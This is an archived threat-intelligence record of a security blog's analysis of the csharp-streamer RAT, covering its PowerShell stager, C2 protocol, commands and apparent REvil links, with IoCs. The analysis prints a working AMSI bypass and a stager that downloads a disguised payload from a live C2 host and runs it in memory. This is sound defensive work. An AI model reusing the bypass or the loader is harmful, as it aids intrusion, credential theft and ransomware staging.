{ "id": "da1967f4-9f2f-49ab-bd3a-73235d617618", "created_at": "2026-04-06T00:20:05.472409Z", "updated_at": "2026-04-10T03:30:33.175037Z", "deleted_at": null, "sha1_hash": "68cf4f2b9d7b80d077aca767a0658c2e9b6d8c26", "title": "The csharp-streamer RAT | cyber.wtf", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 256650, "plain_text": "The csharp-streamer RAT | cyber.wtf\r\nArchived: 2026-04-05 17:41:54 UTC\r\nIn an Incident Response case earlier this year, we encountered an interesting piece of malware that turned out to\r\nbe a RAT written in C#. In this post we’ll give an overview about how it was loaded onto the systems and what its\r\ngeneral capabilities are.\r\nPowerShell stager\r\nAs is often the case, a PowerShell script was used to deploy the malware. The scripts we encountered in this case\r\nwere heavily obfuscated with arithmetic expressions and dead code.\r\nFigure 1: Eek. An obfuscated mess that goes on like this for a couple thousand lines\r\nThe majority of the script looked like this, except for the end, which was more readable once code formatting had\r\nbeen applied - it contained some XOR unmasking code for the final PowerShell code that downloaded the RAT\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 1 of 10\n\npayload. The question was, what does the huge initial piece of code do? Of course it’s completely infeasible to\r\nmanually clean up this much code. In this case, it was relatively easy to find points of interest in the jungle of\r\nstatements by simply searching for dots ( . ). Those are often an indication that a member of an object is\r\naccessed, e.g., a function. All variables used in such function calls were obfuscated strings, but it’s trivial to insert\r\nsome console prints into the code and then run everything in a lab environment to get an idea what the purpose of\r\nthe code is. It turned out it’s just a heavily obfuscated AMSI bypass (AMSI is for Anti Malware Scanning\r\nInterface and is a Microsoft API for scanning data for malicious contents, e.g., a scripting engine may want to scan\r\nscripts it is about to execute).\r\nAt the same time we asked ourselves, what if we ever happen upon an obfuscated script that hides actual logic and\r\nnot just a few flat calls without any control flow decisions being involved? It would be quite annoying to figure\r\nout. A static approach that takes a script as input and outputs a deobfuscated script without ever executing any of it\r\nwould be much preferable. As it happens, a project called DeobShell exists which does exactly that. Previously, it\r\nwas primarily geared to deobfuscating scripts that play with string- and escaping tricks. We’ve recently\r\ncontributed some enhancements to make it work on arithmetic expressions as seen above, to remove more types of\r\ndead code and to make it more performant on large scripts.\r\nThe result:\r\n 3;49;24;792;501;-533;3;49;24;792;501;-533;3;49;24;792;501;-533;\r\n [Ref].Assembly.GetType(\"System.Management.Automation.AmsiUtils\").GetField(\"amsiInitFailed\", \"NonPublic,Static\"\r\n 3;49;24;792;501;-533;3;49;24;792;501;-533;\r\n $UdplfvSTexKLMs = \"Invoke-Mimikatz\";\r\n $gdfsodsao = [Ref].Assembly.GetType(\"System.Management.Automation.AmsiUtils\").GetMethod(\"ScanContent\", [System\r\nIgnore the integers, they appear to be side-effects of the obfuscation that was applied; they have no effect other\r\nthan being printed to the console output. The rest of the code disables AMSI via the commonly seen method of\r\nsetting amsiInitFailed to true. It then scans a string that would be seen as malicious, at least when the default\r\nAMSI provider is used (other AV products can override it and implement more sophisticated scanning that does\r\nnot rely on single keywords). Interestingly, the result is stored to a variable $gdfsodsao , which should be\r\nAMSI_RESULT_NOT_DETECTED and is later used as the XOR unmasking key. Thus if messing with AmsiUtils\r\nfailed and AMSI remains enabled, or if an analyst decided to skip the initial obfuscated part of the script, decoding\r\nthe next PowerShell code to be run will result in garbage.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n[byte[]]$dsahg78das = @(78, 84, 56, 113, 97, 83, 82, 102, 84, 51, 78, [rest omitted for brevi\r\nfunction fdsjnh{\r\n $arrMath = New-Object System.Collections.ArrayList;\r\n \r\n for ($i = 0; $i -le $dsahg78das.Length - 1; $i++)\r\n {\r\n $arrMath.Add([char]$dsahg78das[$i]) | Out-Null;\r\n }\r\n $z = $arrMath -join \"\";\r\n $enc = [System.Text.Encoding]::UTF8;\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 2 of 10\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n $xorkey = $enc.GetBytes(\"$gdfsodsao\");\r\n $string = $enc.GetString([System.Convert]::FromBase64String($z));\r\n $byteString = $enc.GetBytes($string);\r\n $xordData = $(\r\n for ($i = 0; $i -lt $byteString.Length; )\r\n {\r\n for ($j = 0; $j -lt $xorkey.Length; $j++)\r\n {\r\n $byteString[$i] -bxor $xorkey[$j];\r\n $i++;\r\n if ($i -ge $byteString.Length)\r\n {\r\n $j = $xorkey.Length;\r\n }\r\n }\r\n }\r\n );\r\n $xordData = $enc.GetString($xordData);\r\n return $xordData;\r\n}\r\nfdsjnh | Invoke-Expression;\r\nThe above code base64 decodes a string stored as a byte array and then applies XOR to each character while\r\ncycling the key. One of the more interesting aspects is probably line 19, which collects “unconsumed” expressions\r\nand captures them using a sub-expression that is started in line 14. As a more simple example, writing $x = $(1;\r\n2; $y = 7; 1+2; 4); would yield a sequence containing 1, 2, 3, 4 . This is a consequence of PowerShell’s\r\nstructured pipeline concept, and in most other languages it would not be possible or would yield only the very last\r\nelement of the sequence.\r\nWe saw two variants of the script, where one had slightly more obfuscation applied to the last line in order to hide\r\nthat an expression is being invoked. The other variant also had a big try-catch block around everything, where the\r\ncatch part had a hardcoded AMSI_RESULT_NOT_DETECTED key as a fallback if something went wrong. It kind of\r\ndefeats the whole purpose of what has come before, but trying to reconstruct a threat actor’s thought process tends\r\nto only lead to headaches.\r\nThe decoded script looks like this:\r\ntry {\r\n $rawData = (Invoke-webrequest \"https://thevsf.co.uk/serverhpuk.png\" -UseBasicParsing -UserAgent \"Mozilla/5.0\r\n $rawData = [System.Text.Encoding]::ASCII.GetString($rawData)\r\n}catch {\r\n $wc = New-Object System.Net.WebClient; $wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy();\r\n $rawData = $wc.DownloadString('https://thevsf.co.uk/serverhpuk.png')\r\n}\r\nfunction xor {\r\n param($string, $method, $key)\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 3 of 10\n\n$enc = [System.Text.Encoding]::UTF8\r\n $xorkey = $enc.GetBytes(\"$key\")\r\n if ($method -eq \"decrypt\"){\r\n $string = $enc.GetString([System.Convert]::FromBase64String($string))\r\n }\r\n $byteString = $enc.GetBytes($string)\r\n $xordData = $(for ($i = 0; $i -lt $byteString.length; ) {\r\n for ($j = 0; $j -lt $xorkey.length; $j++) {\r\n $byteString[$i] -bxor $xorkey[$j]\r\n $i++\r\n if ($i -ge $byteString.Length) {\r\n $j = $xorkey.length\r\n }\r\n }\r\n })\r\n if ($method -eq \"encrypt\") {\r\n $xordData = [System.Convert]::ToBase64String($xordData)\r\n } else {\r\n $xordData = $enc.GetString($xordData)\r\n }\r\n return $xordData\r\n}\r\n$string = xor \"$rawData\" \"decrypt\" \"ejco1xfioh7wdlmngrhhwuod9taynam\"\r\n$bytes = [System.Convert]::FromBase64String($string);\r\n[Reflection.Assembly]$assembly = [System.AppDomain]::CurrentDomain.Load($bytes) # Load Assembly\r\n[Reflection.MethodInfo]$metInfo = $assembly.EntryPoint # Get Entry Point\r\n[object]$injObj = $assembly.CreateInstance($metInfo.Name)\r\n[object[]]$parametrsObj = [object]::new()[1] # Get Params\r\nif($metInfo.GetParameters().Length -eq 0) # If Assembly - VB, update params\r\n{\r\n $parametrsObj = $null\r\n}\r\n$metInfo.Invoke($injObj, (, [string[]] (''))) # Invoke\r\nIt attempts to download a file disguised as png from a server, first using the system proxy and if that fails,\r\nwithout proxy. The file is not actually an image, it’s a .NET PE. It uses the same XOR masking logic as before,\r\nthis time encapsulated in a xor function. The code following that looks like a straight-up copy from some web\r\nresource, including comments. It loads the assembly into the current app domain in the PowerShell process and\r\nbegins executing it at its entrypoint.\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 4 of 10\n\n.NET assembly payload csharp-streamer\r\nUpon opening the assembly in dnSpy, to our delight we notice that the assembly is not obfuscated. This makes\r\nreversing .NET code a walk in the park, because you have names for all types, fields, methods and parameters.\r\nOne of the first things that can be noticed is that the RAT relies on a lot of third-party code that was bundled into\r\nthe assembly. All of it is open-source and available on GitHub:\r\nBleak (a DLL injection library)\r\nRandom-CSharpTools/DllLoader (loader for Powerkatz; not actually used)\r\nKeystrokeAPI (a keylogging library)\r\nLunar (another DLL injection library)\r\nMegaApiClient (client for mega.nz cloud host)\r\nMS17010Test (tests remote Windows systems for EternalBlue vulnerability)\r\nSharpSploit (.NET post-exploitation library; subset only: Enumeration, Execution, Generic and Misc)\r\nWebSocketSharp (C# websockets library)\r\n…and some other generic libraries like Newtonsoft.Json, Google.Protobuf and Ionic.Zlib from DotNetZip\r\nThis list already gives a first glimpse at the capabilities of the malware (e.g., keylogging, loading more code, data\r\nexfiltration, network reconnaissance).\r\nBut before we dive deeper into capabilities, let’s first discuss how the RAT operates. The malware can either be\r\ninvoked directly (as seen above in PowerShell), or it can be registered as service, in which case a --service\r\nargument needs to be passed to the executable. Both ways of startup eventually run the following method:\r\nnamespace csharp_streamer\r\n{\r\n internal static class ProgramCodeWrapper\r\n {\r\n public static void ThreadedStart()\r\n {\r\n foreach (string text in new string[] { \"thevsf.co.uk\" })\r\n {\r\n GlobalState.kRunningConnections.Add(text);\r\n TunneledSocket tunneledSocket = new TunneledSocket(false, text, new int[] { 80, 443, 25, 2525, 1\r\n Console.SetOut(new MyWriter(tunneledSocket));\r\n tunneledSocket.ConnectToNextPort();\r\n }\r\n LocalNetworkP2P.StartScanNetwork();\r\n }\r\n }\r\n}\r\nThe networking code will attempt to establish a connection to the C2 server via websockets on each of the\r\nspecified ports, until it succeeds. -1 has a special meaning and is used if everything else failed - it establishes an\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 5 of 10\n\nICMP “connection” and camouflages protocol data in ping packets. Perhaps the authors of the malware are\r\nspeculating that on heavily firewalled systems, ICMP traffic may still pass through unhindered.\r\nAs can also be seen in the code, the standard output is redirected to a class that writes all output to the server\r\nconnection. This gives us a first hint that this RAT may be command-line-based, i.e., the operators have a terminal\r\nthat they can type commands into, which will then be executed on the victim’s machine and the output is sent back\r\n(one of the functions is literally called SendStringToTerminal ).\r\nThe protocol is not entirely textual, though. It consists of packets that are serialized using Protobuf. Payloads are\r\nencrypted using RC4 with a hardcoded key.\r\npublic void SendProtocolPacket(PACKET_TYPES packetType, int packetIndex, int packetQueue, ByteString data, int\r\n{\r\n PacketHeader packetHeader = new PacketHeader();\r\n packetHeader.ProtocolVersion = this.protocolVersion;\r\n packetHeader.PacketIndex = packetIndex;\r\n packetHeader.PacketQueue = packetQueue;\r\n packetHeader.PacketType = Convert.ToInt32(packetType);\r\n packetHeader.PacketEncrypted = true;\r\n packetHeader.PacketPacked = false;\r\n packetHeader.PacketStreamId = PacketStreamId;\r\n packetHeader.PacketData = ByteString.CopyFrom(RC4.Encrypt(data.ToArray\u003cbyte\u003e()));\r\n byte[] array = packetHeader.ToByteArray();\r\n if (packetHeader.PacketType != Convert.ToInt32(PACKET_TYPES.ptRegister))\r\n {\r\n this._network.EnqueueCompiledPacket(streamId, array);\r\n return;\r\n }\r\n this._network.SendPacketInstantly(packetHeader.ToByteArray());\r\n}\r\nThere are different packet types:\r\npublic enum PACKET_TYPES\r\n{\r\n ptRegister = 2,\r\n ptSocks5,\r\n ptScreenshot,\r\n ptCommands,\r\n ptFileUpload,\r\n ptMimiCredentials,\r\n ptPing,\r\n ptPowershell,\r\n ptFilePath,\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 6 of 10\n\nptFileRequest\r\n}\r\nptCommands is used whenever the terminal is involved, meaning this type is used when textual commands arrive\r\nfrom the server, and it is also used to send back textual output. A lot of functionality of the RAT is implemented\r\nusing text commands, with the remainder such as screenshots and file-related functions having their own packet\r\ntypes because they don’t fit terminal-style operation so well. Seeing this, it’s possible that the operators also have\r\nsome GUI on their side that can display screenshots and perhaps a file tree, similar to Cobalt Strike’s team server,\r\nwhere the terminal pane is just one part.\r\nAfter establishing a connection to the server, a register packet is sent. This packet contains some basic information\r\nabout the machine csharp-streamer is executing on, such as local IP address, domain name, computer name, user\r\nname and whether the user is an admin. Once a valid response to this packet is received from the server, the RAT\r\nconsiders itself connected. From this point, it does nothing but wait for commands from the server.\r\nNotably, there is no persistence mechanism in the malware itself. If persistence across reboots is desired, it needs\r\nto be arranged externally. In our case, the PowerShell script shown initially in this post was downloaded from a\r\nserver using a small Net.WebClient.DownloadString() snippet in a scheduled task as well as a service in some\r\ninstances. However, both the task and service were deleted shortly after execution, so that they were merely a\r\nmeans of launching execution and not a means of achieving persistence.\r\nCommands\r\nThe RAT supports the following command groups:\r\nADUtils: Query LDAP directory services for computers or servers specifically\r\nExecuteAssembly: Load a .NET assembly from a URL, local path or network share and execute it,\r\noptionally passing parameters\r\nFiletree: Get a file listing for a specified root path. It’s optionally possible to specify a mask that filenames\r\nshould match and begin/end dates for last modification date (amusingly, this is capped at 2022, so it’s\r\ncurrently not possible to search for files that were modified later than that). The RAT does some pretty\r\nelaborate file classification based on filenames and extensions and returns a category such as\r\nXFS_PASSWORDS , XFS_SENSITIVE , XFS_FINANCE , XFS_ADMINFILES to the server for each file\r\nHttpServer: Host a HTTP server on a given port, serving file listings and files from a given base path\r\nKeylogger: Turn keylogging on/off. Logs are written to the temp dir with a name of KBDLog-\u003cMM-dd-yyyy\u003e.txt\r\nMEGA: Download files and folders our upload files and folders with various constraints (patterns, dates) -\r\nsee screenshot below\r\nMimi: Use powerkatz variant of Mimkatz to execute commands\r\nlogonpasswords/samdump/lsasecrets/lsacache/wdigest/dcsync/passthehash. The server must transmit\r\npowershell_x86 / powershell_x64 to the client’s file cache beforehand\r\nPortScan: Check an IP address range for a range of open ports to discover interesting applications that\r\nmay be hosted in the network. The port scanner can also invoke the EternalBlue checking code if requested\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 7 of 10\n\nProcess: List processes, dump process of interest (via pid or name). Probably used to dump the lsass\r\nprocess\r\nPsExec: Custom psexec-like implementation to copy binaries to a remote system and launch them there as\r\nservice. Notably, this also supports propagating csharp-streamer itself by supplying @self as service\r\nbinary path. It can also launch binaries in the entire domain if @ldappcs is specified as target\r\nRelay: Launch a TCP relay that forwards packets received on a specified port to another system, e.g., an\r\ninternal host that cannot directly talk to the internet\r\nRunas: Launch a process impersonating another user. Can also copy a token from an existing process\r\nSendfile: Multi-threaded exfiltration of files/directories via POST request to a given server (path /store )\r\nSget: Load a named file from the server and store it in the RAT’s in-memory file cache, and also on disk at\r\na specified path or in the temp dir\r\nSmbLogin: Test SMB login credentials against an IP address range or all systems queried via LDAP\r\nSpawn: Loads a DLL or shellcode into a process; either an existing process, or msiexec.exe is launched\r\nas injection target\r\nVeeamdump: If Veeam Backup \u0026 Replication is installed, checks Veeam’s registry settings in order to get\r\ndatabase connection details. Connects to the database (until version 12 released in 2023, it was only\r\npossible to use Microsoft SQL Server as db, which .NET can interact with natively) and runs queries to\r\nobtain credentials for authenticating with other hosts on the network. The credentials are ordinarily used to,\r\nfor example, get root access to Linux machines for backup purposes\r\nWget: As the name suggests, simply downloads a file from a URL to a specified local path or temp file\r\ninternal class CommandMEGA\r\n{\r\n internal void Help(TunneledSocket ts)\r\n {\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega login [login-email] [password]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega login [anon]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega getfile [url]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega getfile [url] [target]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega getfolder [url]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega putfile [path] [remote path]\");\r\n ProtoCommands.SendStringToTerminal(ts, \"[MEGA] : HELP. \u003e\u003e\u003e mega putfolder [path] [remote path] [pattern]\r\n }\r\nAs can be seen above at the example of MEGA, command help is implemented on the client side. The majority of\r\ncommand processing classes implement a Help function that lists available sub-commands and their parameters.\r\nIt is sent to the operator if they don’t specify any sub-command or if they forget to specify any required parameter.\r\nPeer-to-peer mode?\r\nAs hinted by the line LocalNetworkP2P.StartScanNetwork() that could be seen in the startup code screenshot\r\nearlier in the post, the RAT appears to possess some capabilities for running in peer-to-peer mode. Ordinarily, one\r\nwould assume that means it can work in a sort of serverless mode, perhaps creating a bridge for clients that cannot\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 8 of 10\n\ntalk to the internet directly. However, that’s not the case here. All code paths involving the P2P functionality first\r\ncheck if a connection to the server is already established:\r\nprivate static void WaitForServerConnection()\r\n{\r\n while (!GlobalState.bIsConnectedToServer)\r\n {\r\n Thread.Sleep(1000);\r\n }\r\n}\r\nThe above method is called before scanning the network for open “relay” ports (6667, 6669, 6670, 6671) as well\r\nas before attempting to connect to any found relays (those two code paths run on concurrent threads).\r\nAnother theory would be that the relays are supposed to serve as a load-balancing measure, e.g., to prevent all\r\nclients from downloading payloads such as powerkatz from the control server, instead taking them from other\r\nlocal clients that already downloaded them to their file cache. However, that would require code for actually\r\ncreating such files response packets in the RAT, which is not present - it can only process received files, not send\r\nthem out again.\r\nAll in all this seems to be a rather half-baked feature, since in its current form, it doesn’t add anything to the\r\nmalware’s capabilities. Perhaps it was an idea the developer(s) had and started implementing, but it was never\r\ntested properly or followed up on.\r\nHistory and attribution\r\ncsharp-streamer has been around since at least April 2021, when it was identified by Fortgale in a ransomware\r\ncampaign. Code-wise, we found it has not evolved much in that time. There are a handful of new features, such as\r\nthe keylogger functionality and the commands for executing .NET assemblies, SMB login testing and Veeam\r\ncredential dumping. Fortgale linked the RAT to the Gold Southfield operator that ran the REvil ransomware\r\noperation.\r\nIn our particular case, the attack was detected before any ransomware payload was dropped, making it harder to\r\nattribute. REvil has been silent this year, but it’s not unlikely its former members or associates have launched a\r\nnew operation employing this RAT. Another possibility is that csharp-streamer is developed independently and\r\nadvertised as a useful toolkit to ransomware groups that can then purchase it, but we don’t have any evidence that\r\nwould support this.\r\nArista has seen csharp-streamer in a similar operation in 2022 that was also detected before ransomware was\r\ndeployed; they incorrectly labelled it as “a variant of SharpSploit”. SharpSploit is a library that does not exert any\r\nbehavior by itself without an application driving it. The library is just a small part of the chsarp-streamer RAT,\r\nwhich contains features that far surpass SharpSploit’s capabilities.\r\nConclusion\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 9 of 10\n\nIn this post we studied a quite advanced RAT that provides pretty much everything a threat actor requires in\r\npreparation of a ransomware attack. It incorporates commands for exfiltrating data, credential access, network\r\ndiscovery and lateral movement and the ability to deploy payloads to all Windows systems in reach. As such, it\r\ncombines many smaller tools like IP scanners, Mimikatz and PSExec into a single piece of malware that can be\r\ncontrolled via a unified backend interface.\r\nIoCs\r\n056cf0d4afdf17648e83739e3e96b53fa802bd0750fe6e74cdbe2fcea2b03c7e (csharp-streamer thevsf)\r\n6a082dd209ec019de653f71e0ee22e6613ce5e9010b8fa089b02f79a1a90652a (csharp-streamer dmvlng)\r\nhttps://thevsf.co.uk/serverhpuk.png\r\nhttps://dmvlng.com/dotcom-client.png\r\nSource: https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/" ], "report_names": [ "the-csharp-streamer-rat" ], "threat_actors": [ { "id": "c84bbd2e-003d-4c43-8a46-d777455db2c7", "created_at": "2022-10-25T15:50:23.701006Z", "updated_at": "2026-04-10T02:00:05.378962Z", "deleted_at": null, "main_name": "GOLD SOUTHFIELD", "aliases": [ "GOLD SOUTHFIELD", "Pinchy Spider" ], "source_name": "MITRE:GOLD SOUTHFIELD", "tools": [ "ConnectWise", "REvil" ], "source_id": "MITRE", "reports": null }, { "id": "7961bf6e-e429-484c-93e2-bd1d36fa5588", "created_at": "2023-01-06T13:46:39.275053Z", "updated_at": "2026-04-10T02:00:03.270128Z", "deleted_at": null, "main_name": "GOLD SOUTHFIELD", "aliases": [], "source_name": "MISPGALAXY:GOLD SOUTHFIELD", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "02ef8063-7ad4-42ba-a646-97210000f6b5", "created_at": "2024-06-19T02:03:08.117993Z", "updated_at": "2026-04-10T02:00:03.614663Z", "deleted_at": null, "main_name": "GOLD SOUTHFIELD", "aliases": [ "" ], "source_name": "Secureworks:GOLD SOUTHFIELD", "tools": [ "REvil" ], "source_id": "Secureworks", "reports": null }, { "id": "9df68733-9bcd-43b1-88f1-24b110fa3d56", "created_at": "2022-10-25T16:07:24.051993Z", "updated_at": "2026-04-10T02:00:04.851037Z", "deleted_at": null, "main_name": "Pinchy Spider", "aliases": [ "G0115", "Gold Garden", "Gold Southfield", "Pinchy Spider" ], "source_name": "ETDA:Pinchy Spider", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "GandCrab", "GrandCrab", "REvil", "Sodin", "Sodinokibi", "VIDAR", "Vidar Stealer", "certutil", "certutil.exe", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434805, "ts_updated_at": 1775791833, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/68cf4f2b9d7b80d077aca767a0658c2e9b6d8c26.pdf", "text": "https://archive.orkl.eu/68cf4f2b9d7b80d077aca767a0658c2e9b6d8c26.txt", "img": "https://archive.orkl.eu/68cf4f2b9d7b80d077aca767a0658c2e9b6d8c26.jpg" } }